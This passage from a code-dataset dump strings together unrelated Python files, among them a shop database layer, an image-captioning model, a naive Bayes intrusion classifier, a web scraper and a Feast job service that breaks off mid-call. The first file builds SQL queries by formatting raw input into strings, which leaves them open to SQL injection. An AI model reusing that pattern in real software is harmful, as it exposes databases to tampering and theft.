\"\"\".format(item_category)\n return fetch_items(select_command(sql_query))\n\n\ndef search_items_by_keywords(item_keyword):\n sql_query = \"\"\"\n SELECT *\n FROM Items,Shops\n WHERE keyWords = '{}' AND Shops.status = 'Active' AND Shops.name = Items.shop_name AND Items.kind <> 'prize'\n \"\"\".format(item_keyword)\n return fetch_items(select_command(sql_query))\n\n\ndef update_item(item_id, field_name, new_value):\n sql = \"\"\"\n UPDATE Items\n SET {} = '{}'\n WHERE id = '{}'\n \"\"\".format(field_name, new_value, item_id)\n return commit_command(sql)\n\n\ndef get_shop_items(shop_name):\n sql = \"\"\"\n SELECT * FROM Items WHERE shop_name='{}'\n \"\"\".format(shop_name)\n return fetch_items(select_command(sql))\n\n\ndef get_item_by_code(code):\n sql_query = \"\"\"\n SELECT Items.*\n FROM Items,InvisibleDiscounts\n WHERE Items.id = InvisibleDiscounts.item_id AND InvisibleDiscounts.code = '{}'\n \"\"\".format(code)\n return fetch_item(select_command(sql_query))\n\n\ndef get_top_five_ranked_items():\n sql = \"\"\"\n SELECT Items.* FROM Items,Shops \n WHERE Items.kind <> 'prize' AND Items.shop_name = Shops.name AND Shops.status = 'Active'\n 
ORDER BY item_rating DESC limit 5\n \"\"\"\n return fetch_items(select_command(sql))\n\n\ndef get_id_by_name(item_name):\n sql = \"\"\"\n SELECT id FROM Items\n WHERE name = '{}'\n \"\"\".format(item_name)\n return select_command(sql)[0][0]\n","repo_name":"omriattiya/uTrade","sub_path":"DatabaseLayer/Items.py","file_name":"Items.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70239465327","text":"# for Coverage\nfrom mock import patch\n\n\nclass TestCommodities:\n def test_all(self):\n from pyEX import Client\n c = Client('test')\n with patch('pyEX.common._getJsonIEXCloud'), \\\n patch('pickle.dump'):\n c.wti()\n c.brent()\n c.natgas()\n c.heatoil()\n c.jet()\n c.diesel()\n c.gasreg()\n c.gasmid()\n c.gasprm()\n c.propane()\n","repo_name":"timkpaine/pyEX-zipline","sub_path":"pyEX/tests/test_commodities.py","file_name":"test_commodities.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"2"} +{"seq_id":"33114037483","text":"import RPi.GPIO as GPIO\nimport time\n\n# Set up the GPIO pin for the LED\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(24, GPIO.OUT)\n\n# Set the LED to blink at a rate of 1 Hz (once per second)\nblink_rate = 1\n\ntry:\n while True:\n # Turn on the LED\n GPIO.output(24, GPIO.HIGH)\n time.sleep(blink_rate / 2)\n\n # Turn off the LED\n GPIO.output(24, GPIO.LOW)\n time.sleep(blink_rate / 2)\n\nexcept KeyboardInterrupt:\n # Clean up the GPIO pin before exiting\n GPIO.cleanup()\n","repo_name":"Mahanth-Maha/IntruderAlertSystem","sub_path":"ID_V2_pi/blink.py","file_name":"blink.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"39003410587","text":"\nfrom flask.json import dumps\n\nimport requests\nfrom requests import HTTPError\n\nfrom mockernaut.compat import urljoin\n\n\ndef join(*parts):\n base = ''\n\n return ''.join(map(lambda e: urljoin(base, '{0}'.format(e)), parts))\n\n\nclass Client(object):\n def __init__(self, base_url, api_path):\n self._base_url = base_url\n self._api_path = api_path\n\n def get(self, _id):\n response = requests.get(\n join(self._base_url, self._api_path, '{_id}'.format(_id=_id))\n )\n response.raise_for_status()\n\n return response.json()\n\n def list(self):\n response = requests.get(\n urljoin(self._base_url, self._api_path),\n )\n response.raise_for_status()\n\n return response.json()\n\n def create(self, rule):\n response = requests.post(\n join(self._base_url, self._api_path),\n data=dumps(rule)\n )\n response.raise_for_status()\n\n return response.json()\n\n def delete(self, _id):\n response = requests.delete(\n join(self._base_url, self._api_path, '{_id}'.format(_id=_id))\n )\n response.raise_for_status()\n\n return response.json()\n","repo_name":"marrrvin/mockernaut","sub_path":"mockernaut/client/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34119594451","text":"import contextlib\n\nfrom cupy.cuda import compiler\nfrom cupy.cuda import device\nfrom cupy.cuda import function\nfrom cupy.cuda import memory\nfrom cupy.cuda import profiler\nfrom cupy.cuda import stream\n\ncompile_with_cache = compiler.compile_with_cache\n\nDevice = device.Device\nget_cublas_handle = device.get_cublas_handle\nget_device_id = 
device.get_device_id\n\nalloc = memory.alloc\nMemory = memory.Memory\nMemoryPointer = memory.MemoryPointer\nMemoryPool = memory.MemoryPool\nset_allocator = memory.set_allocator\n\nFunction = function.Function\nModule = function.Module\n\nEvent = stream.Event\nStream = stream.Stream\nget_elapsed_time = stream.get_elapsed_time\n\n\n@contextlib.contextmanager\ndef profile():\n \"\"\"Enable CUDA profiling during with statement.\n\n This function enable profiling on entering with statement, and disable\n profiling on leaving the statement.\n\n >>> with cupy.cuda.profile():\n ... # do something you want to measure\n\n \"\"\"\n profiler.start()\n try:\n yield\n finally:\n profiler.stop()\n","repo_name":"germanRos/chainer-deconv","sub_path":"cupy/cuda/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"2"} +{"seq_id":"25569461726","text":"\"\"\"\nImage Captioning\n\n Input: image.\n Output: A sequence of words in a natural language, which hopefully describes the contents of the input Image.\n\n\"\"\"\n\nimport os\nimport sys\nimport json\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom PIL import Image\nfrom glob import glob\nfrom IPython.display import display\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.nn.utils.rnn import pack_padded_sequence\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\n\nfrom utils import *\nfrom build_vocab import build_vocab\nfrom data_loader import get_loader\n\n# setup\nuse_gpu = torch.cuda.is_available()\n\ndef load_cnn_model(model_name, pretrained=True):\n \"Load and return a convolutional neural network.\"\n assert model_name in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152']\n return models.__dict__[model_name](pretrained)\n\n\ndef load_image(image_path, transform=None):\n \"Load an image and perform given transformations.\"\n image = Image.open(image_path) \n if transform is not None:\n image = transform(image).unsqueeze(0)\n return image\n\n\"\"\"\nData\n\n https://cocodataset.org/#download\n More than 80k training images and 40k validation images.\n At leat 5 captions for every image.\n\"\"\"\n\ndataset = load_json('data/images_captions_train.json')\nprint(dataset['images'][0])\nprint(dataset.keys())\nprint(dataset['annotations'][0])\nshow_random_image_with_caption(dataset)\n\n# building vocab \nDATA_DIR = 'data'\ncaptions_filename = f'{DATA_DIR}/fa_captions.txt'\nvocab_filename = f'{DATA_DIR}/vocab.pkl'\n\nif os.path.exists(vocab_filename):\n vocab = pickle.load(open(vocab_filename, 'rb'))\nelse:\n vocab = build_vocab(captions_filename, min_count=3)\n pickle.dump(vocab, open(vocab_filename, 'wb'))\n\nfor i in range(20):\n print(\"%s --> %d\" %(vocab.idx2word[i], i))\n\n\nimages_dir = f'{DATA_DIR}/images'\ncaptions_json = f'{DATA_DIR}/fa_images_captions_train.json'\nimage_size = 256\ncrop_size = 224\nbatch_size = 16\n\n\ntransform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.RandomCrop(crop_size),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\n])\n\ndata_loader = get_loader(images_dir, captions_json, vocab, \n transform, batch_size, \n shuffle=True, num_workers=0)\n\nimgs, caps, lengths = next(iter(data_loader))\n\nprint(\" \".join([str(id) for id in caps[0][1:-1]]))\nprint(\" \".join([vocab.idx2word[id] for id in 
caps[0][1:-1]]))\n\nprint(caps.size())\n#-----------------------------------------------------\n#Encoder (CNN)\n#----------------------------------------------------\n\nclass EncoderCNN(nn.Module):\n def __init__(self, model_name, embed_size):\n super(EncoderCNN, self).__init__()\n \n # load cnn and remove last layer\n cnn = load_cnn_model(model_name)\n modules = list(cnn.children())[:-1] # remove last layer\n \n self.cnn = nn.Sequential(*modules)\n self.linear = nn.Linear(cnn.fc.in_features, embed_size)\n self.bn = nn.BatchNorm1d(embed_size, momentum=0.01)\n self.init_weights()\n \n def init_weights(self):\n self.linear.weight.data.normal_(0, 0.02)\n self.linear.bias.data.fill_(0)\n \n def forward(self, x):\n x = self.cnn(x) # extract features from input image\n x = Variable(x.data)\n x = x.view(x.size(0), -1)\n x = self.linear(x)\n x = self.bn(x)\n return x\n \n def fine_tune(self, requires_grad=True):\n for param in self.cnn.layer4.parameters():\n param.requires_grad = requires_grad\n#-------------------------------------------------------------\n#Decoder (LSTM)\n#-------------------------------------------------------------\n\nclass DecoderLSTM(nn.Module):\n def __init__(self, vocab_size, embed_size, hidden_size, num_layers, dropout, tie_weights):\n super(DecoderLSTM, self).__init__()\n \n if tie_weights:\n embed_size = hidden_size\n \n self.embedding = nn.Embedding(vocab_size, embed_size)\n self.lstm = nn.LSTM(embed_size, hidden_size, num_layers, batch_first=True, dropout=0.35)\n self.fc = nn.Linear(hidden_size, vocab_size)\n self.dropout = nn.Dropout(p=dropout)\n \n if tie_weights:\n # share weights between embedding and classification layer\n self.fc.weight = self.embedding.weight\n \n self.init_weights()\n \n def init_weights(self):\n self.embedding.weight.data.uniform_(-0.1, 0.1)\n self.fc.weight.data.uniform_(-0.1, 0.1)\n self.fc.bias.data.fill_(0)\n \n def forward(self, features, captions, lengths):\n x = self.embedding(captions)\n x = torch.cat([features.unsqueeze(1), x], dim=1)\n x = self.dropout(x)\n x = pack_padded_sequence(x, lengths, batch_first=True)\n x, _ = self.lstm(x)\n x = self.dropout(x[0])\n x = self.fc(x)\n return x\n \n def sample(self, features, states=None):\n \"\"\"Samples captions for given image features (Greedy search).\"\"\"\n sampled_ids = []\n inputs = features.unsqueeze(1)\n\n for i in range(20): # maximum sampling length\n hiddens, states = self.lstm(inputs, states) # (batch_size, 1, hidden_size), \n outputs = self.fc(hiddens.squeeze(1)) # (batch_size, vocab_size)\n token_id = outputs.max(1)[1]\n sampled_ids += [token_id]\n inputs = self.embedding(token_id)\n inputs = inputs.unsqueeze(1) # (batch_size, 1, embed_size)\n sampled_ids = torch.cat(sampled_ids, 0) # (batch_size, 20)\n return sampled_ids.squeeze()\n\n#-----------------------------------------------\n# Encoder-Decoder\n#-----------------------------------------------\n\nclass EncoderDecoder(nn.Module):\n \n def __init__(self, cnn_name, vocab_size, embed_size, hidden_size, num_layers, dropout, tie_weights):\n super(EncoderDecoder, self).__init__()\n \n if tie_weights:\n embed_size = hidden_size\n \n self.encoder = EncoderCNN(cnn_name, embed_size)\n self.decoder = DecoderLSTM(vocab_size, embed_size, hidden_size, num_layers, dropout, tie_weights)\n \n # create output folder to save weights\n self.save_path = f'{cnn_name}-{embed_size}-{hidden_size}-{num_layers}'\n if not os.path.exists(self.save_path):\n os.mkdir(self.save_path)\n \n def forward(self, images, captions, lengths):\n features = 
self.encoder(images)\n outputs = self.decoder(features, captions, lengths)\n return outputs\n \n def save(self, epoch, loss):\n torch.save({'encoder': self.encoder.state_dict(), \n 'decoder': self.decoder.state_dict()}, f'{self.save_path}/{epoch}-{loss:.2f}.pth')\n \n def load(self, epoch):\n model_path = glob(f'{self.save_path}/{epoch}-*.pth')[-1]\n try:\n d = torch.load(model_path)\n self.encoder.load_state_dict(d['encoder'])\n self.decoder.load_state_dict(d['decoder'])\n except:\n print('Invalid epoch number <{}>, the model does not exist!'.format(epoch))\n\n# model hyper-parameters\ncnn_name = 'resnet50'\nembed_size = 512\nhidden_size = 512\nnum_layers = 2\ntie_weights = True\n\n# training hyper-parameters\nstart_epoch = 0\nnum_epochs = 20\nlearning_rate = 0.001\n\n# training\ndef train_epoch(model, train_dl, criterion, optimizer, scheduler, epoch, last_epoch):\n model.encoder.train()\n model.decoder.train()\n scheduler.step()\n \n total_steps = len(train_dl)\n epoch_loss = 0.0\n \n for i, (images, captions, lengths) in enumerate(train_dl):\n images, captions = to_var(images), to_var(captions)\n targets = pack_padded_sequence(captions, lengths, batch_first=True)[0]\n \n # forward step\n outputs = model(images, captions, lengths)\n loss = criterion(outputs, targets)\n epoch_loss = (epoch_loss * i + loss.data[0]) / (i + 1)\n \n # backward step\n model.encoder.zero_grad()\n model.decoder.zero_grad()\n \n loss.backward()\n torch.nn.utils.clip_grad_norm(model.decoder.parameters(), 5.0)\n optimizer.step()\n \n # report log info\n sys.stdout.flush()\n sys.stdout.write('\\rEpoch [%2d/%2d], Step [%3d/%3d], Loss = %.4f, Perplexity = %.4f '\n % (epoch+1, last_epoch, i+1, total_steps, epoch_loss, np.exp(epoch_loss)))\n print()\n\n return epoch_loss\n\n\ndef train(model, train_dl, criterion, optimizer, scheduler, start_epoch=0, num_epochs=10):\n last_epoch = start_epoch + num_epochs\n \n for epoch in range(start_epoch, last_epoch): \n # train step\n trn_loss = train_epoch(model, data_loader, criterion, optimizer, scheduler, epoch, last_epoch)\n \n # save model\n model.save(epoch, trn_loss)\n#------------------------------------------------------\n#Encoder-Decoder\n#------------------------------------------------------\nmodel = EncoderDecoder(cnn_name, len(vocab), embed_size, hidden_size, num_layers, 0.3, tie_weights)\nif use_gpu:\n model = model.cuda()\n\n# Loss and optimizer\n\n# loss function\ncriterion = nn.CrossEntropyLoss()\nif use_gpu:\n criterion = criterion.cuda()\n \n# list of parameters which will be updated\nparams = list(model.decoder.parameters())\nparams += list(model.encoder.linear.parameters()) \nparams += list(model.encoder.bn.parameters())\n\n# optimizer\noptimizer = torch.optim.RMSprop(params, lr=learning_rate)\nscheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=1, gamma=0.97)\n\n# Training \ntrain(model, data_loader, criterion, optimizer, scheduler, start_epoch, num_epochs)\n\nfrom PIL import Image\n\nval_transform = transforms.Compose([\n transforms.Resize(image_size),\n transforms.CenterCrop(crop_size),\n transforms.ToTensor(),\n transforms.Normalize((0.485, 0.456, 0.406),\n (0.229, 0.224, 0.225))\n])\n\ndef generate_caption(model, img_filenames):\n model.encoder.eval()\n model.decoder.eval()\n \n captions = []\n \n for img_filename in img_filenames:\n\n # prepare test image\n image = load_image(img_filename, val_transform)\n image_tensor = to_var(image, volatile=True)\n\n # Generate features from image\n feature = model.encoder(image_tensor)\n\n # Generate 
caption from image\n sampled_ids = model.decoder.sample(feature)\n sampled_ids = sampled_ids.cpu().data.numpy()\n\n # decode word ids to words\n sampled_caption = []\n for word_id in sampled_ids:\n word = vocab.idx2word[word_id]\n if word == '': break\n sampled_caption.append(word)\n\n caption = \" \".join(sampled_caption[1:])\n captions.append((img_filename, caption))\n \n return captions\n\nimg_filenames = glob('data/images/*.jpg')[:10]\ncaptions = generate_caption(model, img_filenames)\n\nfor img, caption in captions:\n display(show_persian_image_and_caption(caption, img))\n\nimg_filenames = glob('./data/im2txt/*.jpg')[:10]\ncaptions = generate_caption(model, img_filenames)\n\nfor img, caption in captions:\n display(show_persian_image_and_caption(caption, img)) \t\n\n\t\n\n","repo_name":"Foroozani/Deep-Neural-Nets","sub_path":"img_caption_Farsi.py","file_name":"img_caption_Farsi.py","file_ext":"py","file_size_in_byte":11534,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"35194650258","text":"NOTE_DATA = {\n 1 : 'George Washington',\n 2 : 'Thomas Jefferson',\n 5 : 'Abraham Lincoln',\n 10 : 'Alexander Hamilton',\n 20 : 'Andrew Jackson',\n 50 : 'Ulysses S. Grant',\n 100 : 'Benjamin Franklin',\n}\n\nnote = int(input('Please input a US note that EXISTS: $'))\nif note in NOTE_DATA:\n print(f'The US note ${note} has the face of {NOTE_DATA[note]} printed on the note!')\nelse:\n raise TypeError('haha this is what happens if you don\\'t read the instructions')","repo_name":"DGTV11/LCCL-PS-1-to-PS-6","sub_path":"PS 2/ex043.py","file_name":"ex043.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"73666188527","text":"\"\"\"\nThis is a pure Python implementation of the heap sort algorithm.\n\n\"\"\"\n\n\ndef heapify(arr, heap_size, i):\n largest = i\n left = 2*i + 1\n right = 2*i + 2\n\n if left < heap_size and arr[largest] < arr[left]:\n largest = left\n if right < heap_size and arr[largest] < arr[right]:\n largest = right\n if largest != i:\n arr[i], arr[largest] = arr[largest], arr[i]\n heapify(arr, heap_size, largest)\n\n\ndef heap_sort(arr):\n a = len(arr)\n\n for i in range(int(a/2 - 1), -1, -1):\n heapify(arr, a, i)\n for i in range(a-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n heapify(arr, i, 0)\n return arr\n\n\nif __name__ == \"__main__\":\n unsort_array = [1, 4, 7, 2, 1, 3, 2, 5, 4, 2]\n unsort_array2 = [8, 7, 6, 5, 4, 3, 2, 1]\n print(heap_sort(unsort_array))\n print(heap_sort(unsort_array2))\n","repo_name":"Jameswayd/2022-algorithm-homework","sub_path":"Sort/heap_sort_ex.py","file_name":"heap_sort_ex.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"25657419347","text":"# 트리의 부모 찾기: 실버2\n\nimport sys\ninput = sys.stdin.readline\nsys.setrecursionlimit(1000000)\n\ndef recur(node):\n for nxt in tree[node]:\n if parent[nxt] == 0:\n parent[nxt] = node \n recur(nxt)\n\n\nn = int(input())\nparent = [0 for _ in range(n + 1)]\ntree = [[] for _ in range(n + 1)]\nfor _ in range(n - 1):\n a, b = map(int, input().split())\n tree[a].append(b)\n tree[b].append(a)\n\nrecur(1)\nfor i in parent[2:]:\n print(i)\n","repo_name":"hany0147/TWIL","sub_path":"Algorithm/Tree/11725.py","file_name":"11725.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} 
+{"seq_id":"30121546982","text":"import re\nfrom urllib.parse import urljoin\n\nfrom bs4 import BeautifulSoup\n\nimport requests\n\n\nsession = requests.Session()\n\n\ndef main():\n \"\"\"\n クローラーのメイン処理,画像を保存\n \"\"\"\n # ゆるキャラグランプリの HP\n url = \"http://www.yurugp.jp/\"\n\n r = session.get(url)\n soup = BeautifulSoup(r.text, 'lxml')\n # 2011~2018 年のランキングの url を抽出\n links = soup.find_all('a', href=re.compile(\n r'http://www.yurugp.jp/ranking/\\?year=20\\d{2}'))\n img_urls = rank_year(links)\n\n for img_url in img_urls:\n img_url = img_url.get('href')\n img_url_join = urljoin('http://www.yurugp.jp/', url)\n s = get_img_url(img_url_join)\n response = requests.get(s['src'])\n with open('img/' + s['src'].split('/')[-1], 'wb') as file:\n file.write(response.content)\n\n\ndef rank_year(links):\n \"\"\"\n ランキングページから画像の url を抽出する\n \"\"\"\n session = requests.Session()\n\n for link in links:\n link = link.get('href')\n r = session.get(link)\n soup = BeautifulSoup(r.text, 'lxml')\n rank_links = soup.find_all(\n 'option', value=re.compile(r'rank=\\d+_\\d{3}&year=20\\d{2}'))\n rank_links_unique = list(set(rank_links)) # 重複を削除\n\n for rank_link in rank_links_unique:\n response = session.get(\n 'http://www.yurugp.jp/ranking/' + str(rank_link))\n img_soup = BeautifulSoup(response.text, 'lxml')\n img_urls = img_soup.find_all('a', href=re.compile(\n r'../character/detail.php\\?id=\\d{8}'))\n\n return img_urls\n\n\ndef get_img_url(link):\n \"\"\"\n ゆるキャラ個別のページから画像のソースを抽出\n \"\"\"\n img_r = requests.get(link)\n soup = BeautifulSoup(img_r.text, 'lxml')\n img_url = soup.find('img', src=re.compile(\n r'^http://www.yurugp.jp/img/uploads/character/650/\\d{8}.jpg'))\n\n return img_url\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"hyhy-poemer/yuruchara_scraping","sub_path":"yuruchara_scaping.py","file_name":"yuruchara_scaping.py","file_ext":"py","file_size_in_byte":2019,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"11908614330","text":"#!/usr/bin/env python\n\n__author__ = 'mnowotka'\n\n# ----------------------------------------------------------------------------------------------------------------------\n\nimport json\nfrom bottle import run\nfrom optparse import OptionParser\nfrom beaker import app, config, loadPlugins, loadApps\n\n# ----------------------------------------------------------------------------------------------------------------------\n\ndef main(conf_path=None):\n\n standalone = False\n\n if conf_path:\n config.load_config(conf_path)\n else:\n standalone = True\n parser = OptionParser()\n parser.add_option(\"-p\", \"--config_path\", dest=\"config_path\", help=\"path to config file\", default=\"beaker.conf\")\n (options, args) = parser.parse_args()\n conf_path = options.config_path\n config.load_config(conf_path)\n\n apps = json.loads(config.get('installed_apps', '[]'))\n plugins = json.loads(config.get('plugins', '[]'))\n\n loadApps(apps)\n loadPlugins(app, plugins)\n\n server = config.get('server_middleware', 'tornado')\n kwargs = {}\n if server == 'gunicorn':\n try:\n kwargs['workers'] = int(config.get('workers', '4'))\n except Exception as e:\n print(e)\n kwargs['workers'] = 4\n\n if standalone:\n run(app=app, host=config.get('bottle_host', 'localhost'), port=config.get('bottle_port', '8080'),\n debug=config.get('debug', True), server=server, **kwargs)\n else:\n return app\n\nif __name__ == \"__main__\":\n main()\n\nelse:\n apps = json.loads(config.get('installed_apps', '[]'))\n loadApps(apps)\n application = app\n\n# 
----------------------------------------------------------------------------------------------------------------------\n","repo_name":"chembl/chembl_beaker","sub_path":"src/chembl_beaker/run_beaker.py","file_name":"run_beaker.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"2"} +{"seq_id":"28050534812","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nclass naiveBias:\n def calculate_prior(self, df, Y):\n classes = sorted(list(df[Y].unique()))\n prior = []\n for i in classes:\n prior.append(len(df[df[Y]==i])/len(df))\n return prior\n\n def calculate_likelihood_gaussian(self,df, feat_name, feat_val, Y, label):\n feat = list(df.columns)\n df = df[df[Y]==label]\n mean, std = df[feat_name].mean(), df[feat_name].std()\n p_x_given_y = (1 / (np.sqrt(2 * np.pi) * std)) * np.exp(-((feat_val-mean)**2 / (2 * std**2 )))\n return p_x_given_y\n\n def naive_bayes_gaussian(self,df, X, Y):\n # get feature names\n features = list(df.columns)[:-1]\n\n # calculate prior\n prior = self.calculate_prior(df, Y)\n\n Y_pred = []\n # loop over every data sample\n for x in X:\n # calculate likelihood\n labels = sorted(list(df[Y].unique()))\n likelihood = [1]*len(labels)\n for j in range(len(labels)):\n for i in range(len(features)):\n likelihood[j] *= self.calculate_likelihood_gaussian(df, features[i], x[i], Y, labels[j])\n\n # calculate posterior probability (numerator only)\n post_prob = [1]*len(labels)\n for j in range(len(labels)):\n post_prob[j] = likelihood[j] * prior[j]\n\n Y_pred.append(post_prob)\n\n return np.array(Y_pred) \n\n\n\n\n\n\nlocation = pd.read_csv(\"/Users/raghav/Documents/Programs/projects/ids_prediction/dataset/ids_dataset_updated.csv\")\n\ndataFrame = pd.DataFrame(location)\n\n\npredictors = dataFrame.iloc[:,:-1].values # Leave the last column alone\ntarget = dataFrame.iloc[:,-1].values # Select the last column alone\n\n\n# 80 train : 20 test\npredTrain, predTest, tarTrain, tarTest = train_test_split(\n predictors,\n target,\n train_size=0.8,\n test_size=0.2,\n shuffle=True)\n\n\ntestInput = [[4,349950,14844034,76099589,158473,2540,4,4,663067,662932]] # Normal \n#testInput = [[1,2990,67970025,63263334,4240,1906,5,1,13782,13662]] # BlackHole \n#testInput = [[1,1241,25263813,25832,188,236,4,1,3216,3106]] # Tcp Syn \n#testInput = [[3,744,12647232,31974078,126060,241,4,3,127492,127392]] # PortScan\n#testInput = [[2,4571,113552526,94919832,6236,2757,5,3,24500,24272]] # Diversion \nnb = naiveBias()\n\n\n\nnaiv = nb.naive_bayes_gaussian(dataFrame,testInput,Y=\"Label\")\n\nnaiv = naiv[0]\n\nfor i in naiv:\n print(i)\nprint(naiv)\n\nsums = sum(naiv)\n\n\nname = [\"Normal\",\"Block hole\",\"TCP SYN\",\"port scan\",\"Diversion\"]\nfor i in range(len(naiv)):\n temp = (naiv[i]/sums)*100\n print(f\"{name[i]} --- {temp:.2f}%\")\n\n","repo_name":"raghavtwenty/ids-prediction","sub_path":"code/_3_nb.py","file_name":"_3_nb.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"70559681328","text":"import logging\nimport os\nimport signal\nimport threading\nimport time\nimport traceback\nfrom concurrent.futures import ThreadPoolExecutor\nfrom typing import Dict, List, Optional, Tuple, cast\n\nimport grpc\nfrom google.api_core.exceptions import FailedPrecondition\nfrom google.protobuf.timestamp_pb2 import Timestamp\n\nfrom feast import Client as FeastClient\nfrom feast 
import FeatureTable\nfrom feast.core import JobService_pb2_grpc as LegacyJobService_pb2_grpc\nfrom feast.data_source import DataSource\nfrom feast_spark import Client as Client\nfrom feast_spark.api import JobService_pb2_grpc\nfrom feast_spark.api.JobService_pb2 import (\n CancelJobResponse,\n GetHistoricalFeaturesRequest,\n GetHistoricalFeaturesResponse,\n GetJobResponse,\n)\nfrom feast_spark.api.JobService_pb2 import Job as JobProto\nfrom feast_spark.api.JobService_pb2 import (\n JobStatus,\n JobType,\n ListJobsResponse,\n ScheduleOfflineToOnlineIngestionJobRequest,\n ScheduleOfflineToOnlineIngestionJobResponse,\n StartOfflineToOnlineIngestionJobRequest,\n StartOfflineToOnlineIngestionJobResponse,\n StartStreamToOnlineIngestionJobRequest,\n StartStreamToOnlineIngestionJobResponse,\n UnscheduleOfflineToOnlineIngestionJobRequest,\n UnscheduleOfflineToOnlineIngestionJobResponse,\n)\nfrom feast_spark.constants import ConfigOptions as opt\nfrom feast_spark.pyspark.abc import (\n BatchIngestionJob,\n RetrievalJob,\n SparkJob,\n SparkJobStatus,\n StreamIngestionJob,\n)\nfrom feast_spark.pyspark.launcher import (\n get_job_by_id,\n get_stream_to_online_ingestion_params,\n list_jobs,\n schedule_offline_to_online_ingestion,\n start_historical_feature_retrieval_job,\n start_offline_to_online_ingestion,\n start_stream_to_online_ingestion,\n unschedule_offline_to_online_ingestion,\n)\nfrom feast_spark.third_party.grpc.health.v1.HealthService_pb2 import (\n HealthCheckResponse,\n ServingStatus,\n)\nfrom feast_spark.third_party.grpc.health.v1.HealthService_pb2_grpc import (\n HealthServicer,\n add_HealthServicer_to_server,\n)\n\nlogger = logging.getLogger(__name__)\n\n\ndef _job_to_proto(spark_job: SparkJob) -> JobProto:\n job = JobProto()\n job.id = spark_job.get_id()\n job.log_uri = cast(str, spark_job.get_log_uri() or \"\")\n job.error_message = cast(str, spark_job.get_error_message() or \"\")\n status = spark_job.get_status()\n if status == SparkJobStatus.COMPLETED:\n job.status = JobStatus.JOB_STATUS_DONE\n elif status == SparkJobStatus.IN_PROGRESS:\n job.status = JobStatus.JOB_STATUS_RUNNING\n elif status == SparkJobStatus.FAILED:\n job.status = JobStatus.JOB_STATUS_ERROR\n elif status == SparkJobStatus.STARTING:\n job.status = JobStatus.JOB_STATUS_PENDING\n else:\n raise ValueError(f\"Invalid job status {status}\")\n\n if isinstance(spark_job, RetrievalJob):\n job.type = JobType.RETRIEVAL_JOB\n job.retrieval.output_location = spark_job.get_output_file_uri(block=False)\n elif isinstance(spark_job, BatchIngestionJob):\n job.type = JobType.BATCH_INGESTION_JOB\n job.batch_ingestion.table_name = spark_job.get_feature_table()\n elif isinstance(spark_job, StreamIngestionJob):\n job.type = JobType.STREAM_INGESTION_JOB\n job.stream_ingestion.table_name = spark_job.get_feature_table()\n else:\n raise ValueError(f\"Invalid job type {job}\")\n\n job.start_time.FromDatetime(spark_job.get_start_time())\n\n return job\n\n\nclass JobServiceServicer(JobService_pb2_grpc.JobServiceServicer):\n def __init__(self, client: Client):\n self.client = client\n\n @property\n def _whitelisted_projects(self) -> Optional[List[str]]:\n if self.client.config.exists(opt.WHITELISTED_PROJECTS):\n whitelisted_projects = self.client.config.get(opt.WHITELISTED_PROJECTS)\n return whitelisted_projects.split(\",\")\n return None\n\n def is_whitelisted(self, project: str):\n # Whitelisted projects not specified, allow all projects\n if not self._whitelisted_projects:\n return True\n return project in self._whitelisted_projects\n\n def 
StartOfflineToOnlineIngestionJob(\n self, request: StartOfflineToOnlineIngestionJobRequest, context\n ):\n \"\"\"Start job to ingest data from offline store into online store\"\"\"\n\n if not self.is_whitelisted(request.project):\n raise ValueError(\n f\"Project {request.project} is not whitelisted. Please contact your Feast administrator to whitelist it.\"\n )\n\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n job = start_offline_to_online_ingestion(\n client=self.client,\n project=request.project,\n feature_table=feature_table,\n start=request.start_date.ToDatetime(),\n end=request.end_date.ToDatetime(),\n )\n\n job_start_timestamp = Timestamp()\n job_start_timestamp.FromDatetime(job.get_start_time())\n\n return StartOfflineToOnlineIngestionJobResponse(\n id=job.get_id(),\n job_start_time=job_start_timestamp,\n table_name=request.table_name,\n log_uri=job.get_log_uri(), # type: ignore\n )\n\n def ScheduleOfflineToOnlineIngestionJob(\n self, request: ScheduleOfflineToOnlineIngestionJobRequest, context\n ):\n \"\"\"Schedule job to ingest data from offline store into online store periodically\"\"\"\n feature_table = self.client.feature_store.get_feature_table(\n request.table_name, request.project\n )\n schedule_offline_to_online_ingestion(\n client=self.client,\n project=request.project,\n feature_table=feature_table,\n 